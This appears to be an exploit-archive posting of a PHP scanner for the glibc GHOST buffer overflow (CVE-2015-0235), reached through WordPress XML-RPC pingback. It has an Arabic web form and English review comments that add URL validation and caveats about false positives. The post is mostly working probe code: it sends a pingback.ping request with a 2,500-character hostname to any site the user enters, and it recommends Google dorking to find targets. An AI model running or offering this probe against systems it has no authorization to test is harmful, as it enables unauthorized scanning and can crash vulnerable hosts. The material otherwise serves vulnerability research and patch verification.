## https://sploitus.com/exploit?id=PACKETSTORM:189622
=============================================================================================================================================
| # Title : WordPress 4.2.4 XMLRPC GHOST Vulnerability Scanner |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://wordpress.org/ |
=============================================================================================================================================
POC :
[+] Dorking in Google or other search engine.
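[+] Code Description: Standalone PHP code to scan WordPress for the GHOST vulnerability using XML-RPC.
(linked: https://packetstorm.news/files/id/181060/ Linked CVE numbers: CVE-2015-0235). GHOST is a buffer overflow in glibc's gethostbyname functions, not a flaw in WordPress itself: the XML-RPC pingback is only the path that reaches the resolver, so the remedy is updating glibc on the host.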
[+] save code as poc.php.
[+] Usage : http://127.0.0.1/poc.php
[+] PayLoad :
<?php
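/**
 * Probes a site's WordPress XML-RPC pingback endpoint for the GHOST condition (CVE-2015-0235).
 *
 * Every public method sends HTTP requests from this server to the configured target. The target
 * is therefore restricted to http/https URLs before any request is made: get_headers() and
 * file_get_contents() accept any registered stream wrapper (file://, php://, ftp://, ...), so an
 * unchecked value would let whoever supplies it read local resources through the scanner.
 */
class WordpressGhostScanner
{
    /** @var mixed Base URL of the site to check, exactly as supplied by the caller. */
    private $target;

    /** @var int Number of "0" characters used as the host part of the probe URL. */
    private $length;

    /**
     * @param mixed $target Base URL of the site to check (validated lazily, on first use).
     * @param int   $length Length of the all-zero host name placed in the pingback probe.
     */
    public function __construct($target, $length = 2500)
    {
        $this->target = $target;
        $this->length = $length;
    }

    /**
     * Reports whether the target answers with an X-Pingback response header.
     *
     * @return bool False when the target is not an http(s) URL, when no headers could be
     *              fetched, or when none of them mentions X-Pingback.
     */
    public function isWordpress()
    {
        if (!$this->hasHttpTarget()) {
            return false;
        }

        $headers = @get_headers($this->target);
        if (!$headers) {
            return false;
        }

        foreach ($headers as $header) {
            if (stripos($header, 'X-Pingback') !== false) {
                return true;
            }
        }

        return false;
    }

    /**
     * Reports whether <target>/xmlrpc.php returns the "XML-RPC server accepts" banner.
     *
     * @return bool False when the target is not an http(s) URL or the banner is absent.
     */
    public function isXmlrpcEnabled()
    {
        if (!$this->hasHttpTarget()) {
            return false;
        }

        $url = $this->target . "/xmlrpc.php";
        $response = @file_get_contents($url);

        return $response !== false && stripos($response, 'XML-RPC server accepts') !== false;
    }

    /**
     * Runs the pre-checks and the pingback probe, and returns a human-readable verdict.
     *
     * @return string One of the fixed Arabic status messages below.
     */
    public function checkVulnerability()
    {
        if (!$this->hasHttpTarget()) {
            // "The link is invalid; only http and https links are allowed."
            return "الرابط غير صالح؛ يسمح فقط بروابط http و https.";
        }
        if (!$this->isWordpress()) {
            // "This site does not use WordPress."
            return "هذا الموقع لا يستخدم ووردبريس.";
        }
        if (!$this->isXmlrpcEnabled()) {
            // "The XMLRPC interface is not enabled on this site."
            return "الواجهة XMLRPC غير مفعلة على هذا الموقع.";
        }

        // The probe is a pingback.ping call whose two URL parameters carry a host name made of
        // $length "0" characters.
        $ghost = str_repeat("0", $this->length);
        $payload = "http://{$ghost}/test.php";
        $xml = "<?xml version='1.0'?><methodCall><methodName>pingback.ping</methodName><params><param><value>$payload</value></param><param><value>$payload</value></param></params></methodCall>";
        $context = stream_context_create([
            'http' => [
                'method' => 'POST',
                'header' => "Content-Type: text/xml\r\n",
                'content' => $xml,
            ],
        ]);

        $response = @file_get_contents($this->target . '/xmlrpc.php', false, $context);

        // NOTE(review): with the default stream context file_get_contents() returns false for
        // connection failures, timeouts and any 4xx/5xx status, not only for HTTP 500. A request
        // blocked by a WAF or an unreachable host is therefore reported as "vulnerable" too.
        // Treat that verdict as a lead and confirm it against the glibc package installed on
        // the host.
        // $http_response_header is filled in by the HTTP wrapper in this scope; it is only read
        // when a response body was received.
        if ($response === false || strpos($http_response_header[0], '500') !== false) {
            // "The site is exposed because of the GHOST vulnerability."
            return "الموقع مستهدف بسبب ثغرة GHOST.";
        }

        // "The site is not exposed to the GHOST vulnerability."
        return "الموقع غير معرض لثغرة GHOST.";
    }

    /**
     * Accepts the target only when it is a string that parses as an http:// or https:// URL with
     * a host and contains no whitespace or control characters (which could otherwise smuggle
     * extra lines into the outgoing request).
     *
     * @return bool
     */
    private function hasHttpTarget()
    {
        if (!is_string($this->target) || preg_match('/[\x00-\x20\x7f]/', $this->target) === 1) {
            return false;
        }

        $parts = parse_url($this->target);
        if (!is_array($parts) || !isset($parts['scheme'], $parts['host']) || $parts['host'] === '') {
            return false;
        }

        return in_array(strtolower($parts['scheme']), ['http', 'https'], true);
    }
}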
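// Simple user interface: run the check when the form is submitted.
// This handler makes the server send HTTP requests to a caller-chosen URL, so the page should
// only be served where untrusted users cannot reach it.
if (isset($_SERVER['REQUEST_METHOD']) && $_SERVER['REQUEST_METHOD'] === 'POST') {
    // A missing field or an array value (target[]=...) must not reach the scanner: the original
    // code read $_POST['target'] unconditionally and concatenated whatever it found into URLs.
    $target = isset($_POST['target']) && is_string($_POST['target']) ? trim($_POST['target']) : '';

    if ($target === '') {
        // "Please enter the site link."
        $result = "يرجى إدخال رابط الموقع.";
    } else {
        $scanner = new WordpressGhostScanner($target);
        $result = $scanner->checkVulnerability();
    }
}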
?>
<!DOCTYPE html>
<html lang="ar">
<head>
<meta charset="UTF-8">
<title>فحص ثغرة GHOST في ووردبريس</title>
</head>
<body>
<h2>أداة فحص ثغرة GHOST في ووردبريس</h2>
<form method="POST">
<label>أدخل رابط الموقع:</label>
<input type="text" name="target" required>
<button type="submit">فحص</button>
</form>
<?php /* Show the verdict only after a form submission has set $result. */ if (isset($result)): ?>
<p><strong>النتيجة:</strong> <?php /* Escaped before being placed in element content. */ echo htmlspecialchars($result); ?></p>
<?php endif; ?>
</body>
</html>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================